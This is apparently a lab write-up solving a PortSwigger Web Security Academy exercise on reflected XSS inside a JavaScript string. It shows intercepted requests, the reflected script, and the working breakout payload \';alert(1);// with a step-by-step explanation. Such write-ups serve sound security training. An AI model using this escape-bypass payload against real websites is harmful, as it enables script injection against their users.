Reflected XSS into a JavaScript string with angle brackets and double quotes HTML encoded and single quotes escaped

Description

This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets and double are HTML encoded and single quotes are escaped.

To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.

Approach

After accessing the lab, I intercepted the /search request and sent it to Burp Suite Repeater:

GET /?search=ichyaboy HTTP/2
Host: 0aa7005203f4f06384107c3e0063006d.web-security-academy.net
Cookie: session=owoPdZ7o4Bb1QTmhpOTgAGI6AmW17yYN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...

I noticed that my input was being escaped using a backslash \:

When I sent:

GET /?search='ichyaboy

I got:

<script>
	var searchTerms = '\'ichyaboy';
	document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>

To escape this backslash, I needed to add an additional \. Therefore, the payload would look like this:

GET /?search=\'ichyaboy

Then I got:

<script>
	var searchTerms = '\\'ichyaboy';
	document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>

Building the final payload:

GET /?search=\';alert(1);//

Let's break down this payload:

\ : This backslash is used to escape the backslash that the application uses to escape my single quote. By adding this backslash, I neutralize the escaping backslash and allow the single quote to close the searchTerms string.
'; : This closes the searchTerms string in the script tag, allowing me to inject new JavaScript code.
alert(1); : This is the injected JavaScript code that will execute an alert box with the message "1".
// : This comments out the remainder of the JavaScript code to prevent any syntax errors from the original script.

By sending this payload, I successfully triggered an alert box, confirming the XSS vulnerability and solving the lab.

PreviousReflected XSS into a JavaScript string with single quote and backslash escaped NextReflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode escaped